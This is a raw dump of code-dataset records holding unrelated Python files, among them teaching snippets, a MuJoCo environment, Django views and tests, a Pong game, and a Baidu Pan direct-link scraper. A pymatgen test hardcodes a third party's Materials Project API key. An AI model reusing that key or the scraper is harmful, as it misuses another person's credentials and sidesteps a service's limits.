_age和_gender属性\n __slots__ = ('_name', '_age', '_gender')\n\n def __init__(self, name, age):\n self._name = name\n self._age = age\n\n @property\n def name(self):\n return self._name\n\n @property\n def age(self):\n return self._age\n\n @age.setter\n def age(self, age):\n self._age = age\n\n def play(self):\n if self._age <= 16:\n print('%s正在玩飞行棋.' % self._name)\n else:\n print('%s正在玩斗地主.' % self._name)\n\n\ndef main():\n person = Person('王大锤', 22)\n person.play()\n person._gender = '男'\n # AttributeError: 'Person' object has no attribute '_is_gay'\n # person._is_gay = True\n\"\"\"\n\"\"\"\n静态方法\n\nfrom math import sqrt\n\n\nclass Triangle(object):\n\n def __init__(self, a, b, c):\n self._a = a\n self._b = b\n self._c = c\n\n @staticmethod\n def is_valid(a, b, c):\n return a + b > c and b + c > a and a + c > b\n\n def perimeter(self):\n return self._a + self._b + self._c\n\n def area(self):\n half = self.perimeter() / 2\n return sqrt(half * (half - self._a) *\n (half - self._b) * (half - self._c))\n\n\ndef main():\n a, b, c = 3, 4, 5\n # 静态方法和类方法都是通过给类发消息来调用的\n if Triangle.is_valid(a, b, c):\n t = Triangle(a, b, c)\n print(t.perimeter())\n # 也可以通过给类发消息来调用对象方法但是要传入接收消息的对象作为参数\n # print(Triangle.perimeter(t))\n print(t.area())\n # print(Triangle.area(t))\n else:\n print('无法构成三角形.')\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n类方法\n\nfrom time import time, localtime, sleep\n\n\nclass Clock(object):\n\n def __init__(self, hour=0, minute=0, second=0):\n self._hour = hour\n self._minute = minute\n self._second = second\n\n @classmethod\n def now(cls):\n ctime = localtime(time())\n return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec)\n\n def run(self):\n self._second += 1\n if self._second == 60:\n self._second = 0\n self._minute += 1\n if self._minute == 60:\n self._minute = 0\n self._hour += 1\n if self._hour == 24:\n self._hour = 0\n\n def show(self):\n return '%02d:%02d:%02d' % \\\n (self._hour, self._minute, self._second)\n\n\ndef main():\n # 通过类方法创建对象并获取系统时间\n clock = Clock.now()\n while True:\n print(clock.show())\n sleep(1)\n clock.run()\n\n\nif __name__ == '__main__':\n main() \n\"\"\"\n\"\"\"\nflag = not True\nmy_str = ''\nmy_str = 'hello' if flag else 'bye'\nprint(my_str)\n\"\"\"\nfrom time import time\n\n\ndef main():\n total = 0\n number_list = [x for x in range(1, 100000001)]\n start = time()\n for number in number_list:\n total += number\n print(total)\n end = time()\n print('Execution time: %.3fs' % (end - start))\n\n\nif __name__ == '__main__':\n 
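# timing demo: main() sums the 10**8 integers built above in pure Python\n 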
main()\n","sub_path":"study/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"441728303","text":"from modular_mujoco_envs.modular_mujoco_env import ModularMujocoEnv\nimport numpy as np\n\n\nclass ModularHumanoid2dEnv(ModularMujocoEnv):\n \"\"\"Defines a custom base class for MuJoCo environments that provides \n a common interface for extracting morphology information from the agent, \n including the positions, orientations, and range of each limb.\n \n \"\"\"\n\n def __init__(self, xml, control_penalty=1e-3, alive_bonus=1.0,\n time_skip=5, include_joint_range_in_obs=True,\n include_position_in_obs=True, \n include_orientation_in_obs=True,\n include_position_vel_in_obs=True, \n include_orientation_vel_in_obs=True,\n one_joint_per_limb=True, hide_root_x_position=True):\n \"\"\"Instantiates a modular MuJoCo environment using a custom xml \n file defining the structure of the agent, and provides a clean \n interface to extracting the agent's morphology.\n\n Arguments:\n\n xml: str\n the path an xml file on the disk containing an agent with a \n unique morphology, such as a humanoid with only one leg.\n control_penalty: float\n penalize taking large actions by adding a term proportional \n to the negative l2 norm of the action to the reward.\n alive_bonus: float\n encourage the agent to stay alive and avoid falling by adding \n a positive constant to the reward at every step.\n time_skip: int\n the number of time steps to run the mujoco simulator for every\n step of the outer reinforcement learning environment.\n\n include_joint_range_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the joint range.\n include_position_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body position.\n include_orientation_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body orientation.\n \n include_position_vel_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body velocity.\n include_orientation_vel_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body velocity.\n\n one_joint_per_limb: bool\n a boolean that controls whether each observation per limb \n includes only a single joint if multiple are available.\n hide_root_x_position: bool\n a boolean that controls whether the root x position of the\n agent is not included in the observation for the torso.\n\n \"\"\"\n\n # build the superclass using modified default arguments\n super(ModularHumanoid2dEnv, self).__init__(\n xml, control_penalty=control_penalty, \n alive_bonus=alive_bonus, time_skip=time_skip,\n include_joint_range_in_obs=include_joint_range_in_obs,\n include_position_in_obs=include_position_in_obs, \n include_orientation_in_obs=include_orientation_in_obs,\n include_position_vel_in_obs=include_position_vel_in_obs, \n include_orientation_vel_in_obs=include_orientation_vel_in_obs,\n one_joint_per_limb=one_joint_per_limb, \n hide_root_x_position=hide_root_x_position)\n\n def viewer_setup(self):\n \"\"\"Positions the camera in the scene in order to visualize the\n behavior acquired by neural network policies.\n\n \"\"\"\n\n self.viewer.cam.trackbodyid = 1\n 
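# track body 1, pull the camera back to the model's spatial extent,\n # look at z = 2.0 and tilt down 20 degrees\n 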
self.viewer.cam.distance = self.model.stat.extent * 1.0\n self.viewer.cam.lookat[2] = 2.0\n self.viewer.cam.elevation = -20\n\n def has_finished(self, action):\n \"\"\"Determines whether the agent has fallen, or otherwise is unable\n to proceed in the environemnt, and returns True on such \n conditions, indicating the episode has finished.\n\n Arguments:\n\n action: np.ndarray\n a vector of actions for a modular mujoco agent, which\n should match the order of bodies in the xml file.\n\n Returns:\n\n done\n\n \"\"\"\n\n torso_height, torso_ang = self.sim.data.qpos[1:3]\n return not (torso_height > 0.4 and torso_height < 2.1 and\n torso_ang > -1.0 and torso_ang < 1.0)\n","sub_path":"modular_mujoco_envs/modular_humanoid2d_env.py","file_name":"modular_humanoid2d_env.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"432341846","text":"from setuptools import setup\n\nwith open('README.rst', 'r') as infile:\n long_des = infile.read()\n\nsetup(\n name='pydogs',\n description='A Delaunay based approach of hyperparmeter optimization.',\n long_description=long_des,\n version='0.1.5',\n url='https://github.com/deltadogs/pyDOGS4',\n author='Shahrouz Ryan Alimo',\n author_email='salimoha@ucsd.edu',\n packages=['pydogs']\n)\n","sub_path":"pypi_install_script/pydogs-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"35056077","text":"# coding: utf-8\n\nfrom __future__ import division\n\n__status__ = \"Development\"\n\nimport copy\nimport inspect\nimport os\nimport unittest\nfrom shutil import copyfile\n\nfrom monty.serialization import loadfn\nfrom monty.tempfile import ScratchDir\nfrom pymatgen.analysis.defects.thermodynamics import DefectPhaseDiagram\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram\nfrom pymatgen.core import Composition, Element\nfrom pymatgen.entries.computed_entries import ComputedEntry\nfrom pymatgen.ext.matproj import MPRester\nfrom pymatgen.util.testing import PymatgenTest\n\nfrom doped.pycdt.core._chemical_potentials import (\n ChemPotAnalyzer,\n MPChemPotAnalyzer,\n UserChemPotAnalyzer,\n UserChemPotInputGenerator,\n get_mp_chempots_from_dpd,\n)\n\nTEST_DIR = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\", \"test_files\"))\n\n\nclass UserChemPotAnalyzerTest(PymatgenTest):\n def setUp(self):\n with MPRester(api_key=\"c2LiJRMiBeaN5iXsH\") as mp:\n self.bulk_ce = mp.get_entry_by_material_id(\"mp-2534\")\n self.UCPA = UserChemPotAnalyzer(\n bulk_ce=self.bulk_ce, mapi_key=\"c2LiJRMiBeaN5iXsH\"\n )\n # SK MP Imperial email A/C API key\n self.UCPA_sub = UserChemPotAnalyzer(\n bulk_ce=self.bulk_ce, sub_species=[\"In\"], mapi_key=\"c2LiJRMiBeaN5iXsH\"\n )\n\n def test_read_phase_diagram_and_chempots(self):\n # set up a local phase diagram object...\n # test non mp case,\n with ScratchDir(\".\"):\n # os.mkdir('PhaseDiagram')\n os.makedirs(os.path.join(\"PhaseDiagram\", \"Ga\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_Ga\"),\n os.path.join(\"PhaseDiagram\", \"Ga\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", 
\"vasprun.xml\"),\n )\n cp = self.UCPA.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=False\n )\n self.assertEqual(set([\"As-GaAs\", \"Ga-GaAs\"]), set(cp[\"facets\"].keys()))\n self.assertEqual(\n [-5.36, -4.29],\n [\n round(cp[\"facets\"][\"As-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n self.assertEqual(\n [-6.04, -3.61],\n [\n round(cp[\"facets\"][\"Ga-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n\n # followed by an case where MP needs to supplement...\n with ScratchDir(\".\"):\n os.mkdir(\"PhaseDiagram\")\n # NO Ga entry included this time\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", \"vasprun.xml\"),\n )\n cp = self.UCPA.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=True\n )\n self.assertEqual(set([\"As-GaAs\", \"Ga-GaAs\"]), set(cp[\"facets\"].keys()))\n self.assertEqual(\n [-5.36, -4.29],\n [\n round(cp[\"facets\"][\"As-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n self.assertEqual(\n [-6.62, -3.03],\n [\n round(cp[\"facets\"][\"Ga-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n\n # quick and dirty test for finding extrinsic defects...\n with ScratchDir(\".\"):\n os.mkdir(\"PhaseDiagram\")\n # NO Ga entry or In entry this time\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", \"vasprun.xml\"),\n )\n cp = self.UCPA_sub.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=True)\n self.assertEqual({'As-GaAs-In', 'Ga-GaAs-In'}, set(cp[\"facets\"].keys()))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"doped/pycdt/core/tests/test_chemical_potentials.py","file_name":"test_chemical_potentials.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"602930258","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport wave\n\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\n\nfrom webapp.forms import WAVForm, WAVChangeForm\nfrom webapp.models import WAVFile\n\n\ndef wav_add_view(request):\n form = WAVForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save()\n try:\n if wave.open(obj.file.path).getparams()[:3] != (1, 2, 8000):\n raise wave.Error()\n except (FileNotFoundError, wave.Error):\n obj.convert()\n\n return redirect(reverse('webapp:list'))\n return render(request, 'webapp/wav/add.html', {'form': form})\n\n\ndef wav_list_view(request):\n return render(request, 'webapp/wav/list.html', {'objects': WAVFile.objects.all()})\n\n\ndef wav_change_view(request, pk):\n obj = get_object_or_404(WAVFile, pk=pk)\n form = WAVChangeForm(instance=obj, data=request.POST or None)\n if form.is_valid():\n obj = form.save()\n try:\n if wave.open(obj.file.path).getparams()[:3] != (1, 2, 8000):\n raise wave.Error()\n except 
(FileNotFoundError, wave.Error):\n obj.convert()\n return redirect(reverse('webapp:list'))\n return render(request, 'webapp/wav/change.html', {'form': form})\n\n\ndef wav_delete_view(request, pk):\n if request.method == 'POST':\n obj = get_object_or_404(WAVFile, pk=pk)\n obj.delete()\n return redirect(reverse('webapp:list'))\n\n raise Http404()\n","sub_path":"fileloader/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"411199061","text":"\n\n#calss header\nclass _LOX():\n\tdef __init__(self,): \n\t\tself.name = \"LOX\"\n\t\tself.definitions = [u' salmon (= a type of fish) that has been preserved with smoke: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lox.py","file_name":"_lox.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"201763374","text":"import logging\nfrom pykafka import KafkaClient\nfrom pykafka.simpleconsumer import OffsetType\n\nlogging.getLogger(\"pykafka.broker\").setLevel('ERROR')\n\nconsumer_client = KafkaClient(hosts=\"localhost:9092\")\n\ncons_topic = consumer_client.topics['demo']\n\ndata_consumer = cons_topic.get_balanced_consumer(\n consumer_group = b'pytkafka-demo-2',\n auto_commit_enable = False,\n auto_offset_reset = OffsetType.EARLIEST,\n zookeeper_connect = 'localhost:2181'\n)\n\nfor mes in data_consumer:\n if mes is not None:\n print(\"Message\",mes.offset, mes.value)","sub_path":"consumer_data.py","file_name":"consumer_data.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653387934","text":"import pygame\r\nimport time\r\nimport random\r\n\r\npygame.init()\r\npygame.font.init()\r\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\r\nscreen = pygame.display.set_mode((1280,720))\r\ndone = False\r\n#set initial variables\r\np1_x,p1_y=30,30\r\np2_x,p2_y=(screen.get_width()-60),30\r\nball_x,ball_y=((screen.get_width())/2),((screen.get_height())/2)\r\nslope_x,slope_y=2,2\r\npaddle_score=0\r\n#set constants\r\npaddle_width = screen.get_width()/64\r\npaddle_height = screen.get_height()/3.6\r\n#define Paddle class\r\nclass Paddle:\r\n def __init__(self,x,y):\r\n self.x=x\r\n self.y=y\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_height))\r\n self.rect=pygame.Rect(self.x,self.y,paddle_width,paddle_height)\r\n\r\n #macros\r\n self.paddle_speed=3\r\n\r\n def draw(self):\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_height))\r\n self.rect=pygame.Rect(self.x,self.y,paddle_width,paddle_height)\r\n def up(self):\r\n if self.y>0:\r\n self.y-=self.paddle_speed\r\n def down(self):\r\n if self.y= (screen.get_height()):\r\n self.slope_y*=-1\r\n if self.x <= 0:\r\n self.slope_x*=-1\r\n self.ball_score+=1\r\n self.x,self.y=((screen.get_width())/2),((screen.get_height())/2)\r\n time.sleep(1)\r\n if self.x >= (screen.get_width()):\r\n self.slope_x*=-1\r\n self.ball_score+=1\r\n self.x,self.y=((screen.get_width())/2),((screen.get_height())/2)\r\n time.sleep(1)\r\n #collision\r\n self.rect = pygame.Rect(self.x,self.y,paddle_width,paddle_width)\r\n if 
self.rect.colliderect(p1.rect): \r\n self.col(p1) \r\n self.x=p1.x+paddle_width\r\n if self.rect.colliderect(p2.rect): \r\n self.col(p2)\r\n self.x=p2.x-paddle_width\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_width))\r\n self.rect = pygame.Rect(self.x,self.y,paddle_width,paddle_width)\r\n\r\n def col(self,obj):\r\n\r\n if self.slope_x > 0: # Moving right; Hit the left side of the paddle\r\n self.rect.right = obj.rect.left\r\n if self.slope_x < 0: # Moving left; Hit the right side of the paddle\r\n self.rect.left = obj.rect.right\r\n self.paddle_score+=1\r\n self.slope_x*=-1\r\n if self.slope_y>0:\r\n self.slope_y=random.randint(1,3) * -1\r\n else:\r\n self.slope_y=random.randint(1,3)\r\n #self.x+=(self.slope_x*2)\r\n self.y+=self.slope_y\r\n def up(self):\r\n if self.y>0:\r\n self.y-=self.ball_speed\r\n def down(self):\r\n if self.yHello, humans\")\n self.template_snippet = Snippet.objects.create(key=\"django\",\n text=\"{{ dog|upper }}\")\n\n def test_has_snippet(self):\n \"\"\"Ensure that the saved snippet text is displayed\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'plain' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"Hello, humans\")\n\n def test_no_snippet(self):\n \"\"\"Ensure that the default text is displayed\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'missing' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"Hello world\")\n\n def test_plain_text(self):\n \"\"\"Ensure that content is not escaped\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'rich' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"<h1>Hello, humans</h1>\")\n\n def test_richtext(self):\n \"\"\"Ensure that with richtext argument content is escaped\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'rich' richtext=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"
&lt;h1&gt;Hello, humans&lt;/h1&gt;
\")\n\n def test_raw_template_text(self):\n \"\"\"Ensure template code is not compiled by default\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': 'woof'})\n result = t.render(c)\n self.assertEqual(result, \"{{ dog|upper }}\")\n\n def test_template_text(self):\n \"\"\"Ensure template code is rendered with the template option\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': 'woof'})\n result = t.render(c)\n self.assertEqual(result, \"WOOF\")\n\n def test_safe_template_text(self):\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': '
<h1>woof</h1>
'})\n result = t.render(c)\n self.assertEqual(result, \"&lt;H1&gt;WOOF&lt;/H1&gt;\")\n\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True safe=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': '
<h1>woof</h1>
'})\n result = t.render(c)\n self.assertEqual(result, \"
<H1>WOOF</H1>
\")\n\n def test_variable_key_name(self):\n \"\"\"Ensure a variable can be passed for the snippet key\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet snippetname %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'snippetname': 'plain'})\n result = t.render(c)\n self.assertEqual(result, \"Hello, humans\")\n\n\nclass MakeSnippetsTests(TestCase):\n \"\"\"\n Tests that the makesnippets command creates missing snippets from templates\n \"\"\"\n\n def test_is_addendum_positive_check(self):\n \"\"\"\n A valid load addendum_tags tag should be\n considered as addendum template_string\n \"\"\"\n template_string = \"\"\"{% load addendum_tags %}\"\"\"\n check = is_addendum(template_string)\n self.assertTrue(check)\n\n def test_is_addendum_negative_check(self):\n \"\"\"\n An invalid load addendum_tags tag shouldn't\n be considered as addendum template\n \"\"\"\n template_string = \"\"\"load addendum_tags\"\"\"\n check = is_addendum(template_string)\n self.assertFalse(check)\n\n def test_search_snippets_nodes(self):\n \"\"\"\n Ensure that given a valid django template string,\n compiles it and extracts all SnippetNode nodes\n \"\"\"\n template_string = \"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True safe=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\"\n nodes = search_snippet_nodes(template_string)\n self.assertEqual(len(nodes), 1)\n\n def test_search_empty_snippets_nodes(self):\n \"\"\"\n Ensure that given a valid django template string,\n without any SnippetNodes, it doesn't extracts any node\n \"\"\"\n template_string = \"\"\"{% load addendum_tags %}\"\"\"\n nodes = search_snippet_nodes(template_string)\n self.assertEqual(len(nodes), 0)\n\n def test_parse_snippets(self):\n \"\"\"\n Command.parse_snippets should populate the\n Command.found list collected snippet data\n \"\"\"\n c = Command()\n assert len(c.found) == 0\n\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'snippetname' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n snippet_nodes = t.nodelist.get_nodes_by_type(SnippetNode)\n c.parse_snippets(snippet_nodes)\n\n self.assertEqual(len(c.found), 1)\n self.assertEqual(c.found[0], {'name': 'snippetname', 'content': 'Hello world'})\n\n def test_handle_new_results(self):\n \"\"\"Command.handle_results should save new snippets\"\"\"\n assert len(Snippet.objects.all()) == 0\n\n c = Command()\n c.found = [{'name': 'snippetname', 'content': 'Hello world'}]\n\n c.handle_results()\n\n snippets = Snippet.objects.all()\n self.assertEqual(len(snippets), 1)\n self.assertEqual(snippets[0].key, 'snippetname')\n self.assertEqual(snippets[0].text, 'Hello world')\n\n def test_handle_existing_results(self):\n \"\"\"Command.handle_results should not save existing snippets\"\"\"\n assert len(Snippet.objects.all()) == 0\n Snippet.objects.create(key='snippetname', text='Hello World')\n\n c = Command()\n c.found = [{'name': 'snippetname', 'content': 'Hello world altered'}]\n\n c.handle_results()\n\n snippets = Snippet.objects.all()\n self.assertEqual(len(snippets), 1)\n self.assertEqual(snippets[0].key, 'snippetname')\n self.assertEqual(snippets[0].text, 'Hello World')\n","sub_path":"addendum/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"161926899","text":"import re\nimport requests\nimport json\n\nheaders1 = {\n\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'\n}\n\n\ndef main(url):\n headers = {\n 'Host': 'pan.baidu.com',\n 'Origin': 'https://pan.baidu.com',\n 'Referer': url,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'\n }\n try:\n response = requests.get(url, headers=headers1).content.decode('utf-8')\n js = re.findall(r'', response, re.DOTALL)[0]\n timestamp = re.findall(r'\"timestamp\":(.*?),', js, re.DOTALL)[0]\n sign = re.findall(r'\"sign\":\"(.*?)\"', js, re.DOTALL)[0]\n uk = re.findall(r'\"uk\":(.*?),', js, re.DOTALL)[0]\n primaryid = re.findall(r'\"shareid\":(.*?),', js, re.DOTALL)[0]\n fs_id = re.findall(r'\"fs_id\":(.*?),', js, re.DOTALL)[0]\n app_id = re.findall(r'\"app_id\":\"(.*?)\"', js, re.DOTALL)[0]\n data = {\n 'encrypt': '0',\n 'product': 'share',\n 'uk': str(uk),\n 'primaryid': str(primaryid),\n 'fid_list': \"[\" + fs_id + \"]\",\n 'path_list': ''\n }\n url1 = \"https://pan.baidu.com/api/sharedownload?sign=\" + sign + \"&timestamp=\" + timestamp + \"&bdstoken=null\" + \"&channel=chunlei&clienttype=0&web=1\" + \"&app_id=\" + str(\n app_id)\n post_down = requests.post(url=url1, headers=headers, data=data).text\n post_down1 = json.loads(post_down)\n dlink = ((post_down1[\"list\"])[0])['dlink']\n print(dlink)\n except:\n print(\"请求失败,请重新分享链接,确认本机IP未使用3次\")\n\n\nif __name__ == '__main__':\n url = input(\"请输入分享链接(需公开类型,且本机IP未使用3次):\")\n main(url)","sub_path":"baiduyun.py","file_name":"baiduyun.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"81135007","text":"import socket\nfrom re import match\nfrom time import sleep\nfrom kivy.app import App\n\nfrom kivy.clock import Clock\nfrom widgets.Starter import Starter\nfrom widgets.Game import Game\n\n\nclass Client(App):\n def __init__(self, **kwargs):\n super(Client, self).__init__(**kwargs)\n\n try:\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.client_socket.connect((\"127.0.0.1\", 50005))\n self.client_socket.settimeout(0.1)\n\n except Exception as exc:\n print(\"Cant connect\", exc)\n\n self.data = \"\"\n self.game = Game(self.client_socket)\n self.data_receiver = Clock.schedule_interval(self.receive_data, 1)\n\n self.main_loop_clock = Clock.schedule_interval(self.main_loop, 1.2)\n self.main_content = Starter(self.client_socket)\n\n def receive_data(self, _):\n try:\n self.data = self.client_socket.recv(4096).decode(\"utf-8\")\n print(\":::\", self.data)\n\n except socket.timeout:\n pass\n\n def build(self):\n return self.main_content\n\n def main_loop(self, _):\n if self.data == \"game_look\":\n sleep(2)\n self.game.full_answer.text = \"Looking for game\"\n self.main_content.add_widget(self.game)\n\n self.main_loop_clock.cancel()\n self.main_loop_clock = Clock.schedule_interval(self.game_main, 1.2)\n\n def game_main(self, _):\n if match(\"guess\", self.data):\n first_bound = self.data[self.data.find(\";\") + 1:self.data.find(\":\")]\n if not first_bound:\n self.game.full_answer.text = \"An error occurred! Cant receive first bound!\"\n\n second_bound = self.data[self.data.find(\":\") + 1:]\n if not second_bound:\n self.game.full_answer.text = \"An error occurred! 
Cant receive second bound!\"\n\n self.game.full_answer.text = f\"Guess number between {first_bound} and {second_bound}\"\n\n elif match(\"wrong_bigger\", self.data) or match(\"wrong_smaller\", self.data):\n self.game.full_answer.text = f\"Number is {self.data[self.data.find('_') + 1:]}\"\n\n elif self.data == \"win\":\n self.game.full_answer.text = \"Well done!\"\n\n elif match(\"lose\", self.data):\n hp = int(self.data[self.data.find(\":\") + 1:])\n self.game.health.set_hp(hp)\n self.game.full_answer.text = \"You lose!\"\n\n elif self.data == \"game_win\":\n self.game.full_answer.text = \"You win the game!\"\n sleep(1)\n\n elif self.data == \"game_lose\":\n self.game.full_answer.text = \"You lost the game!\"\n sleep(1)\n\n else:\n self.game.full_answer.text = \"Waiting for second player's answer\"\n\n\nif __name__ == '__main__':\n Client().run()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"374599889","text":"import sys\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.optim import lr_scheduler\r\nfrom torch.autograd import Variable\r\nimport torchvision\r\nfrom torchvision import datasets, models, transforms\r\nimport time\r\nimport os\r\nimport copy\r\n\r\ndef print_now(item):\r\n print(item)\r\n sys.stdout.flush()\r\n\r\n######################################################################\r\n# Load Data\r\n# ---------\r\n#\r\n# We will use torchvision and torch.utils.data packages for loading the\r\n# data.\r\n#\r\n# The problem we're going to solve today is to train a model to classify\r\n# **ants** and **bees**. We have about 120 training images each for ants and bees.\r\n# There are 75 validation images for each class. Usually, this is a very\r\n# small dataset to generalize upon, if trained from scratch. Since we\r\n# are using transfer learning, we should be able to generalize reasonably\r\n# well.\r\n#\r\n# Data augmentation and normalization for training\r\n# Just normalization for validation\r\ndata_transforms = {\r\n 'train': transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ]),\r\n 'val': transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ]),\r\n}\r\n\r\ndata_dir = \"./training_data\" #this needs to change based on the user\r\n\r\nimage_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),\r\n data_transforms[x])\r\n for x in ['train', 'val']}\r\n\r\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\r\n shuffle=True, num_workers=4)\r\n for x in ['train', 